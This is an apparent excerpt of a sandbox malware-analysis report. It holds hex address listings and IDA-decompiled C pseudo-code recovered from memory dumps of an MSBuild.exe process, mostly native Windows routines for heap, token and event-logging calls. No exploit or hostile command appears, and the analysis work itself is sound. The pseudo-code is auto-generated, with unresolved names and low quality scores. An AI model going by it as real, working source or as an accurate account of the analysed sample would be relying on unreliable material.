                                            0x010779eb
                                            0x010779eb
                                            0x010779ef
                                            0x010779f1
                                            0x00000000
                                            0x00000000
                                            0x010779f3
                                            0x010779f5
                                            0x010779ff
                                            0x010779ff
                                            0x00000000
                                            0x010779ff
                                            0x010779f7
                                            0x010779fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010779fd
                                            0x01077bd5
                                            0x01077bd8
                                            0x00000000
                                            0x00000000
                                            0x01077ba9
                                            0x01077bac
                                            0x01077bb0
                                            0x01077bb1
                                            0x01077bb1
                                            0x01077bb6
                                            0x00000000
                                            0x01077bb6
                                            0x01077aa7
                                            0x01077aaa
                                            0x00000000
                                            0x00000000
                                            0x01077ab2
                                            0x01077ab3
                                            0x01077ab5
                                            0x01077aec
                                            0x01077aef
                                            0x01077b25
                                            0x01077b28
                                            0x01077b62
                                            0x01077b64
                                            0x01077b8f
                                            0x01077b92
                                            0x01077b96
                                            0x01077b98
                                            0x00000000
                                            0x00000000
                                            0x01077b9e
                                            0x01077b9f
                                            0x01077ba3
                                            0x00000000
                                            0x01077ba3
                                            0x01077b66
                                            0x01077b68
                                            0x01077ae2
                                            0x01077ae2
                                            0x00000000
                                            0x01077ae2
                                            0x01077b6e
                                            0x01077b72
                                            0x01077b75
                                            0x01077b81
                                            0x01077b85
                                            0x01077b87
                                            0x00000000
                                            0x00000000
                                            0x01077b31
                                            0x01077b34
                                            0x01077b3c
                                            0x01077b45
                                            0x01077b46
                                            0x01077b4f
                                            0x01077b51
                                            0x01077b57
                                            0x01077b59
                                            0x01077b59
                                            0x00000000
                                            0x01077b59
                                            0x01077b77
                                            0x00000000
                                            0x01077b77
                                            0x01077b2a
                                            0x00000000
                                            0x01077b2a
                                            0x01077af1
                                            0x01077af3
                                            0x00000000
                                            0x00000000
                                            0x01077afb
                                            0x01077afc
                                            0x01077afe
                                            0x00000000
                                            0x00000000
                                            0x01077b00
                                            0x01077b03
                                            0x00000000
                                            0x00000000
                                            0x01077b05
                                            0x01077b09
                                            0x01077b0d
                                            0x01077b0f
                                            0x00000000
                                            0x00000000
                                            0x01077b18
                                            0x01077b1d
                                            0x00000000
                                            0x01077b1d
                                            0x01077ab7
                                            0x01077ab9
                                            0x00000000
                                            0x00000000
                                            0x01077abf
                                            0x01077ac1
                                            0x00000000
                                            0x00000000
                                            0x01077ac3
                                            0x01077ac6
                                            0x00000000
                                            0x00000000
                                            0x01077ac8
                                            0x01077acc
                                            0x01077ad0
                                            0x01077ad2
                                            0x00000000
                                            0x00000000
                                            0x01077adb
                                            0x00000000
                                            0x01077adb
                                            0x010779d6
                                            0x010779d9
                                            0x010779dc
                                            0x01077a91
                                            0x01077a94
                                            0x00000000
                                            0x01077a94
                                            0x010779e2
                                            0x00000000
                                            0x010779e2
                                            0x01077a74
                                            0x01077a7a
                                            0x00000000
                                            0x00000000
                                            0x01077a8a
                                            0x01077a21
                                            0x01077a21
                                            0x00000000
                                            0x01077a21
                                            0x0100c650
                                            0x0100c651
                                            0x0100c656
                                            0x0100c65c
                                            0x0100c65d
                                            0x0100c663
                                            0x0100c664
                                            0x0100c66a
                                            0x0100c66e
                                            0x010779c5
                                            0x010779c7
                                            0x00000000
                                            0x010779c7
                                            0x0100c67a
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3dcf97584162e35a1396aec79df0cf6b73c8f5727bc5318f46180dfee2f0e538
                                            • Instruction ID: 17922f2cbd6226155821b7ce1293bc990d8b9487864cc461a626a25f017d920d
                                            • Opcode Fuzzy Hash: 3dcf97584162e35a1396aec79df0cf6b73c8f5727bc5318f46180dfee2f0e538
                                            • Instruction Fuzzy Hash: 2A81C671A042019BEB22DE58C884B7F77E4FB84294F14496DEEC58B241D330ED40CB96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 39%
                                            			E0109B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                            				char _v8;
                                            				signed int _v12;
                                            				signed int _t80;
                                            				signed int _t83;
                                            				intOrPtr _t89;
                                            				signed int _t92;
                                            				signed char _t106;
                                            				signed int* _t107;
                                            				intOrPtr _t108;
                                            				intOrPtr _t109;
                                            				signed int _t114;
                                            				void* _t115;
                                            				void* _t117;
                                            				void* _t119;
                                            				void* _t122;
                                            				signed int _t123;
                                            				signed int* _t124;
                                            
                                            				_t106 = _a12;
                                            				if((_t106 & 0xfffffffc) != 0) {
                                            					return 0xc000000d;
                                            				}
                                            				if((_t106 & 0x00000002) != 0) {
                                            					_t106 = _t106 | 0x00000001;
                                            				}
                                            				_t109 =  *0x10f7b9c; // 0x0
                                            				_t124 = L01024620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                            				if(_t124 != 0) {
                                            					 *_t124 =  *_t124 & 0x00000000;
                                            					_t124[1] = _t124[1] & 0x00000000;
                                            					_t124[4] = _t124[4] & 0x00000000;
                                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                            						L13:
                                            						_push(_t124);
                                            						if((_t106 & 0x00000002) != 0) {
                                            							_push(0x200);
                                            							_push(0x28);
                                            							_push(0xffffffff);
                                            							_t122 = E01049800();
                                            							if(_t122 < 0) {
                                            								L33:
                                            								if((_t124[4] & 0x00000001) != 0) {
                                            									_push(4);
                                            									_t64 =  &(_t124[1]); // 0x4
                                            									_t107 = _t64;
                                            									_push(_t107);
                                            									_push(5);
                                            									_push(0xfffffffe);
                                            									E010495B0();
                                            									if( *_t107 != 0) {
                                            										_push( *_t107);
                                            										E010495D0();
                                            									}
                                            								}
                                            								_push(_t124);
                                            								_push(0);
                                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                            								L37:
                                            								L010277F0();
                                            								return _t122;
                                            							}
                                            							_t124[4] = _t124[4] | 0x00000002;
                                            							L18:
                                            							_t108 = _a8;
                                            							_t29 =  &(_t124[0x105]); // 0x414
                                            							_t80 = _t29;
                                            							_t30 =  &(_t124[5]); // 0x14
                                            							_t124[3] = _t80;
                                            							_t123 = 0;
                                            							_t124[2] = _t30;
                                            							 *_t80 = _t108;
                                            							if(_t108 == 0) {
                                            								L21:
                                            								_t112 = 0x400;
                                            								_push( &_v8);
                                            								_v8 = 0x400;
                                            								_push(_t124[2]);
                                            								_push(0x400);
                                            								_push(_t124[3]);
                                            								_push(0);
                                            								_push( *_t124);
                                            								_t122 = E01049910();
                                            								if(_t122 != 0xc0000023) {
                                            									L26:
                                            									if(_t122 != 0x106) {
                                            										L40:
                                            										if(_t122 < 0) {
                                            											L29:
                                            											_t83 = _t124[2];
                                            											if(_t83 != 0) {
                                            												_t59 =  &(_t124[5]); // 0x14
                                            												if(_t83 != _t59) {
                                            													L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                            												}
                                            											}
                                            											_push( *_t124);
                                            											E010495D0();
                                            											goto L33;
                                            										}
                                            										 *_a16 = _t124;
                                            										return 0;
                                            									}
                                            									if(_t108 != 1) {
                                            										_t122 = 0;
                                            										goto L40;
                                            									}
                                            									_t122 = 0xc0000061;
                                            									goto L29;
                                            								} else {
                                            									goto L22;
                                            								}
                                            								while(1) {
                                            									L22:
                                            									_t89 =  *0x10f7b9c; // 0x0
                                            									_t92 = L01024620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                            									_t124[2] = _t92;
                                            									if(_t92 == 0) {
                                            										break;
                                            									}
                                            									_t112 =  &_v8;
                                            									_push( &_v8);
                                            									_push(_t92);
                                            									_push(_v8);
                                            									_push(_t124[3]);
                                            									_push(0);
                                            									_push( *_t124);
                                            									_t122 = E01049910();
                                            									if(_t122 != 0xc0000023) {
                                            										goto L26;
                                            									}
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                            								}
                                            								_t122 = 0xc0000017;
                                            								goto L26;
                                            							}
                                            							_t119 = 0;
                                            							do {
                                            								_t114 = _t124[3];
                                            								_t119 = _t119 + 0xc;
                                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                            								_t123 = _t123 + 1;
                                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                            							} while (_t123 < _t108);
                                            							goto L21;
                                            						}
                                            						_push(0x28);
                                            						_push(3);
                                            						_t122 = E0100A7B0();
                                            						if(_t122 < 0) {
                                            							goto L33;
                                            						}
                                            						_t124[4] = _t124[4] | 0x00000001;
                                            						goto L18;
                                            					}
                                            					if((_t106 & 0x00000001) == 0) {
                                            						_t115 = 0x28;
                                            						_t122 = E0109E7D3(_t115, _t124);
                                            						if(_t122 < 0) {
                                            							L9:
                                            							_push(_t124);
                                            							_push(0);
                                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                            							goto L37;
                                            						}
                                            						L12:
                                            						if( *_t124 != 0) {
                                            							goto L18;
                                            						}
                                            						goto L13;
                                            					}
                                            					_t15 =  &(_t124[1]); // 0x4
                                            					_t117 = 4;
                                            					_t122 = E0109E7D3(_t117, _t15);
                                            					if(_t122 >= 0) {
                                            						_t124[4] = _t124[4] | 0x00000001;
                                            						_v12 = _v12 & 0x00000000;
                                            						_push(4);
                                            						_push( &_v12);
                                            						_push(5);
                                            						_push(0xfffffffe);
                                            						E010495B0();
                                            						goto L12;
                                            					}
                                            					goto L9;
                                            				} else {
                                            					return 0xc0000017;
                                            				}
                                            			}




















                                            0x0109b8d9
                                            0x0109b8e4
                                            0x00000000
                                            0x0109b8e6
                                            0x0109b8f3
                                            0x0109b8f5
                                            0x0109b8f5
                                            0x0109b8f8
                                            0x0109b920
                                            0x0109b924
                                            0x0109b936
                                            0x0109b939
                                            0x0109b93d
                                            0x0109b948
                                            0x0109b9a0
                                            0x0109b9a0
                                            0x0109b9a4
                                            0x0109b9bf
                                            0x0109b9c4
                                            0x0109b9c6
                                            0x0109b9cd
                                            0x0109b9d1
                                            0x0109bad4
                                            0x0109bad8
                                            0x0109bada
                                            0x0109badc
                                            0x0109badc
                                            0x0109badf
                                            0x0109bae0
                                            0x0109bae2
                                            0x0109bae4
                                            0x0109baec
                                            0x0109baee
                                            0x0109baf0
                                            0x0109baf0
                                            0x0109baec
                                            0x0109bafb
                                            0x0109bafc
                                            0x0109bafe
                                            0x0109bb01
                                            0x0109bb01
                                            0x00000000
                                            0x0109bb06
                                            0x0109b9d7
                                            0x0109b9db
                                            0x0109b9db
                                            0x0109b9de
                                            0x0109b9de
                                            0x0109b9e4
                                            0x0109b9e7
                                            0x0109b9ea
                                            0x0109b9ec
                                            0x0109b9ef
                                            0x0109b9f3
                                            0x0109ba1b
                                            0x0109ba1b
                                            0x0109ba23
                                            0x0109ba24
                                            0x0109ba27
                                            0x0109ba2a
                                            0x0109ba2b
                                            0x0109ba2e
                                            0x0109ba30
                                            0x0109ba37
                                            0x0109ba3f
                                            0x0109ba9c
                                            0x0109baa2
                                            0x0109bb13
                                            0x0109bb15
                                            0x0109baae
                                            0x0109baae
                                            0x0109bab3
                                            0x0109bab5
                                            0x0109baba
                                            0x0109bac8
                                            0x0109bac8
                                            0x0109baba
                                            0x0109bacd
                                            0x0109bacf
                                            0x00000000
                                            0x0109bacf
                                            0x0109bb1a
                                            0x00000000
                                            0x0109bb1c
                                            0x0109baa7
                                            0x0109bb11
                                            0x00000000
                                            0x0109bb11
                                            0x0109baa9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0109ba41
                                            0x0109ba41
                                            0x0109ba41
                                            0x0109ba58
                                            0x0109ba5d
                                            0x0109ba62
                                            0x00000000
                                            0x00000000
                                            0x0109ba64
                                            0x0109ba67
                                            0x0109ba68
                                            0x0109ba69
                                            0x0109ba6c
                                            0x0109ba6f
                                            0x0109ba71
                                            0x0109ba78
                                            0x0109ba80
                                            0x00000000
                                            0x00000000
                                            0x0109ba90
                                            0x0109ba90
                                            0x0109ba97
                                            0x00000000
                                            0x0109ba97
                                            0x0109b9f5
                                            0x0109b9f7
                                            0x0109b9f7
                                            0x0109b9fa
                                            0x0109ba03
                                            0x0109ba07
                                            0x0109ba0c
                                            0x0109ba10
                                            0x0109ba17
                                            0x00000000
                                            0x0109b9f7
                                            0x0109b9a6
                                            0x0109b9a8
                                            0x0109b9af
                                            0x0109b9b3
                                            0x00000000
                                            0x00000000
                                            0x0109b9b9
                                            0x00000000
                                            0x0109b9b9
                                            0x0109b94d
                                            0x0109b98f
                                            0x0109b995
                                            0x0109b999
                                            0x0109b960
                                            0x0109b967
                                            0x0109b968
                                            0x0109b96a
                                            0x00000000
                                            0x0109b96a
                                            0x0109b99b
                                            0x0109b99e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0109b99e
                                            0x0109b951
                                            0x0109b954
                                            0x0109b95a
                                            0x0109b95e
                                            0x0109b972
                                            0x0109b979
                                            0x0109b97d
                                            0x0109b97f
                                            0x0109b980
                                            0x0109b982
                                            0x0109b984
                                            0x00000000
                                            0x0109b984
                                            0x00000000
                                            0x0109b926
                                            0x00000000
                                            0x0109b926

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab265215ea3dbd226db6b4f1d9ac7248eca6534c0cd8229d522ec92b4b127a47
                                            • Instruction ID: 36d3516e0d8c1d54ba03b8ab81966fbefe5037574cfe532430740bb26bc5de64
                                            • Opcode Fuzzy Hash: ab265215ea3dbd226db6b4f1d9ac7248eca6534c0cd8229d522ec92b4b127a47
                                            • Instruction Fuzzy Hash: CF71E332200702AFEB31DF18D865F6ABBE5EF44720F144568E6D58B6E0DB75E940EB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E01086DC9(signed int __ecx, void* __edx) {
                                            				unsigned int _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v40;
                                            				char _v44;
                                            				char _v48;
                                            				char _v52;
                                            				char _v56;
                                            				char _v60;
                                            				void* _t87;
                                            				void* _t95;
                                            				signed char* _t96;
                                            				signed int _t107;
                                            				signed int _t136;
                                            				signed char* _t137;
                                            				void* _t157;
                                            				void* _t161;
                                            				void* _t167;
                                            				intOrPtr _t168;
                                            				void* _t174;
                                            				void* _t175;
                                            				signed int _t176;
                                            				void* _t177;
                                            
                                            				_t136 = __ecx;
                                            				_v44 = 0;
                                            				_t167 = __edx;
                                            				_v40 = 0;
                                            				_v36 = 0;
                                            				_v32 = 0;
                                            				_v60 = 0;
                                            				_v56 = 0;
                                            				_v52 = 0;
                                            				_v48 = 0;
                                            				_v16 = __ecx;
                                            				_t87 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                            				_t175 = _t87;
                                            				if(_t175 != 0) {
                                            					_t11 = _t175 + 0x30; // 0x30
                                            					 *((short*)(_t175 + 6)) = 0x14d4;
                                            					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                            					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                            					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                            					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                            					E01086B4C(_t167, _t11, 0x214,  &_v8);
                                            					_v12 = _v8 + 0x10;
                                            					_t95 = E01027D50();
                                            					_t137 = 0x7ffe0384;
                                            					if(_t95 == 0) {
                                            						_t96 = 0x7ffe0384;
                                            					} else {
                                            						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            					}
                                            					_push(_t175);
                                            					_push(_v12);
                                            					_push(0x402);
                                            					_push( *_t96 & 0x000000ff);
                                            					E01049AE0();
                                            					_t87 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                            					_t176 = _v16;
                                            					if((_t176 & 0x00000100) != 0) {
                                            						_push( &_v36);
                                            						_t157 = 4;
                                            						_t87 = E0108795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                            						if(_t87 >= 0) {
                                            							_v24 = E0108795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                            							_v28 = E0108795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                            							_push( &_v52);
                                            							_t161 = 5;
                                            							_t168 = E0108795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                            							_v20 = _t168;
                                            							_t107 = L01024620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                            							_v16 = _t107;
                                            							if(_t107 != 0) {
                                            								_v8 = _v8 & 0x00000000;
                                            								 *(_t107 + 0x20) = _t176;
                                            								 *((short*)(_t107 + 6)) = 0x14d5;
                                            								_t47 = _t107 + 0x24; // 0x24
                                            								_t177 = _t47;
                                            								E01086B4C( &_v36, _t177, 0xc78,  &_v8);
                                            								_t51 = _v8 + 4; // 0x4
                                            								_t178 = _t177 + (_v8 >> 1) * 2;
                                            								_v12 = _t51;
                                            								E01086B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                            								_v12 = _v12 + _v8;
                                            								E01086B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                            								_t125 = _v8;
                                            								_v12 = _v12 + _v8;
                                            								E01086B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                            								_t174 = _v12 + _v8;
                                            								if(E01027D50() != 0) {
                                            									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            								}
                                            								_push(_v16);
                                            								_push(_t174);
                                            								_push(0x402);
                                            								_push( *_t137 & 0x000000ff);
                                            								E01049AE0();
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                            								_t168 = _v20;
                                            							}
                                            							_t87 = L01022400( &_v36);
                                            							if(_v24 >= 0) {
                                            								_t87 = L01022400( &_v44);
                                            							}
                                            							if(_t168 >= 0) {
                                            								_t87 = L01022400( &_v52);
                                            							}
                                            							if(_v28 >= 0) {
                                            								return L01022400( &_v60);
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t87;
                                            			}































                                            0x01086dd4
                                            0x01086dde
                                            0x01086de1
                                            0x01086de3
                                            0x01086de6
                                            0x01086de9
                                            0x01086dec
                                            0x01086def
                                            0x01086df2
                                            0x01086df5
                                            0x01086dfe
                                            0x01086e04
                                            0x01086e09
                                            0x01086e0d
                                            0x01086e18
                                            0x01086e1b
                                            0x01086e22
                                            0x01086e2d
                                            0x01086e30
                                            0x01086e36
                                            0x01086e42
                                            0x01086e4d
                                            0x01086e50
                                            0x01086e55
                                            0x01086e5c
                                            0x01086e6e
                                            0x01086e5e
                                            0x01086e67
                                            0x01086e67
                                            0x01086e73
                                            0x01086e74
                                            0x01086e77
                                            0x01086e7c
                                            0x01086e7d
                                            0x01086e8e
                                            0x01086e93
                                            0x01086e9c
                                            0x01086ea8
                                            0x01086eab
                                            0x01086eac
                                            0x01086eb3
                                            0x01086ecd
                                            0x01086edc
                                            0x01086ee2
                                            0x01086ee5
                                            0x01086ef2
                                            0x01086efb
                                            0x01086f01
                                            0x01086f06
                                            0x01086f0b
                                            0x01086f11
                                            0x01086f1a
                                            0x01086f22
                                            0x01086f26
                                            0x01086f26
                                            0x01086f33
                                            0x01086f41
                                            0x01086f44
                                            0x01086f47
                                            0x01086f54
                                            0x01086f65
                                            0x01086f77
                                            0x01086f7c
                                            0x01086f82
                                            0x01086f91
                                            0x01086f99
                                            0x01086fa3
                                            0x01086fae
                                            0x01086fae
                                            0x01086fba
                                            0x01086fbb
                                            0x01086fbc
                                            0x01086fc1
                                            0x01086fc2
                                            0x01086fd3
                                            0x01086fd8
                                            0x01086fd8
                                            0x01086fdf
                                            0x01086fe8
                                            0x01086fee
                                            0x01086fee
                                            0x01086ff5
                                            0x01086ffb
                                            0x01086ffb
                                            0x01087004
                                            0x00000000
                                            0x0108700a
                                            0x01087004
                                            0x01086eb3
                                            0x01086e9c
                                            0x01087015

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                            • Instruction ID: e2dfdce2d8ebf9612c74caadb20b94229266a94309947cb2225db9824f4fbe23
                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                            • Instruction Fuzzy Hash: 02717F71A00619EFDB11EFA8C984EEEBBB9FF58714F104069E585E7250DB30EA41CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E010052A5(char __ecx) {
                                            				char _v20;
                                            				char _v28;
                                            				char _v29;
                                            				void* _v32;
                                            				void* _v36;
                                            				void* _v37;
                                            				void* _v38;
                                            				void* _v40;
                                            				void* _v46;
                                            				void* _v64;
                                            				void* __ebx;
                                            				intOrPtr* _t49;
                                            				signed int _t53;
                                            				short _t85;
                                            				signed int _t87;
                                            				signed int _t88;
                                            				signed int _t89;
                                            				intOrPtr _t101;
                                            				intOrPtr* _t102;
                                            				intOrPtr* _t104;
                                            				signed int _t106;
                                            				void* _t108;
                                            
                                            				_t93 = __ecx;
                                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                            				_push(_t88);
                                            				_v29 = __ecx;
                                            				_t89 = _t88 | 0xffffffff;
                                            				while(1) {
                                            					E0101EEF0(0x10f79a0);
                                            					_t104 =  *0x10f8210; // 0xac2cc0
                                            					if(_t104 == 0) {
                                            						break;
                                            					}
                                            					asm("lock inc dword [esi]");
                                            					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                            					E0101EB70(_t93, 0x10f79a0);
                                            					if( *((char*)(_t108 + 0xf)) != 0) {
                                            						_t101 =  *0x7ffe02dc;
                                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                            							L9:
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0x90028);
                                            							_push(_t108 + 0x20);
                                            							_push(0);
                                            							_push(0);
                                            							_push(0);
                                            							_push( *((intOrPtr*)(_t104 + 4)));
                                            							_t53 = E01049890();
                                            							__eflags = _t53;
                                            							if(_t53 >= 0) {
                                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                            									E0101EEF0(0x10f79a0);
                                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                            									E0101EB70(0, 0x10f79a0);
                                            								}
                                            								goto L3;
                                            							}
                                            							__eflags = _t53 - 0xc0000012;
                                            							if(__eflags == 0) {
                                            								L12:
                                            								_t13 = _t104 + 0xc; // 0xac2ccd
                                            								_t93 = _t13;
                                            								 *((char*)(_t108 + 0x12)) = 0;
                                            								__eflags = E0103F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                            								if(__eflags >= 0) {
                                            									L15:
                                            									_t102 = _v28;
                                            									 *_t102 = 2;
                                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                            									E0101EEF0(0x10f79a0);
                                            									__eflags =  *0x10f8210 - _t104; // 0xac2cc0
                                            									if(__eflags == 0) {
                                            										__eflags =  *((char*)(_t108 + 0xe));
                                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                            										 *0x10f8210 = _t102;
                                            										_t32 = _t102 + 0xc; // 0x0
                                            										 *_t95 =  *_t32;
                                            										_t33 = _t102 + 0x10; // 0x0
                                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                            										_t35 = _t102 + 4; // 0xffffffff
                                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                            										if(__eflags != 0) {
                                            											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                            											E01084888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                            										}
                                            										E0101EB70(_t95, 0x10f79a0);
                                            										asm("lock xadd [esi], eax");
                                            										if(__eflags == 0) {
                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                            											E010495D0();
                                            											L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            										}
                                            										asm("lock xadd [esi], ebx");
                                            										__eflags = _t89 == 1;
                                            										if(_t89 == 1) {
                                            											_push( *((intOrPtr*)(_t104 + 4)));
                                            											E010495D0();
                                            											L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            										}
                                            										_t49 = _t102;
                                            										L4:
                                            										return _t49;
                                            									}
                                            									E0101EB70(_t93, 0x10f79a0);
                                            									asm("lock xadd [esi], eax");
                                            									if(__eflags == 0) {
                                            										_push( *((intOrPtr*)(_t104 + 4)));
                                            										E010495D0();
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                            									}
                                            									 *_t102 = 1;
                                            									asm("lock xadd [edi], eax");
                                            									if(__eflags == 0) {
                                            										_t28 = _t102 + 4; // 0xffffffff
                                            										_push( *_t28);
                                            										E010495D0();
                                            										L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                            									}
                                            									continue;
                                            								}
                                            								_t93 =  &_v20;
                                            								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                            								_t85 = 6;
                                            								_v20 = _t85;
                                            								_t87 = E0103F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                            								__eflags = _t87;
                                            								if(_t87 < 0) {
                                            									goto L3;
                                            								}
                                            								 *((char*)(_t108 + 0xe)) = 1;
                                            								goto L15;
                                            							}
                                            							__eflags = _t53 - 0xc000026e;
                                            							if(__eflags != 0) {
                                            								goto L3;
                                            							}
                                            							goto L12;
                                            						}
                                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                            							goto L3;
                                            						} else {
                                            							goto L9;
                                            						}
                                            					}
                                            					L3:
                                            					_t49 = _t104;
                                            					goto L4;
                                            				}
                                            				_t49 = 0;
                                            				goto L4;
                                            			}

























                                            0x010052a5
                                            0x010052ad
                                            0x010052b0
                                            0x010052b3
                                            0x010052b7
                                            0x010052ba
                                            0x010052bf
                                            0x010052c4
                                            0x010052cc
                                            0x00000000
                                            0x00000000
                                            0x010052ce
                                            0x010052d9
                                            0x010052dd
                                            0x010052e7
                                            0x010052f7
                                            0x010052f9
                                            0x010052fd
                                            0x01060dcf
                                            0x01060dd5
                                            0x01060dd6
                                            0x01060dd7
                                            0x01060dd8
                                            0x01060dd9
                                            0x01060dde
                                            0x01060ddf
                                            0x01060de0
                                            0x01060de1
                                            0x01060de2
                                            0x01060de5
                                            0x01060dea
                                            0x01060dec
                                            0x01060f60
                                            0x01060f64
                                            0x01060f70
                                            0x01060f76
                                            0x01060f79
                                            0x01060f79
                                            0x00000000
                                            0x01060f64
                                            0x01060df2
                                            0x01060df7
                                            0x01060e04
                                            0x01060e0d
                                            0x01060e0d
                                            0x01060e10
                                            0x01060e1a
                                            0x01060e1c
                                            0x01060e4c
                                            0x01060e52
                                            0x01060e61
                                            0x01060e67
                                            0x01060e6b
                                            0x01060e70
                                            0x01060e76
                                            0x01060ed7
                                            0x01060edc
                                            0x01060ee0
                                            0x01060ee6
                                            0x01060eea
                                            0x01060eed
                                            0x01060ef0
                                            0x01060ef3
                                            0x01060ef6
                                            0x01060ef9
                                            0x01060efe
                                            0x01060f01
                                            0x01060f01
                                            0x01060f0b
                                            0x01060f12
                                            0x01060f16
                                            0x01060f18
                                            0x01060f1b
                                            0x01060f2c
                                            0x01060f31
                                            0x01060f31
                                            0x01060f35
                                            0x01060f39
                                            0x01060f3a
                                            0x01060f3c
                                            0x01060f3f
                                            0x01060f50
                                            0x01060f55
                                            0x01060f55
                                            0x01060f59
                                            0x010052eb
                                            0x010052f1
                                            0x010052f1
                                            0x01060e7d
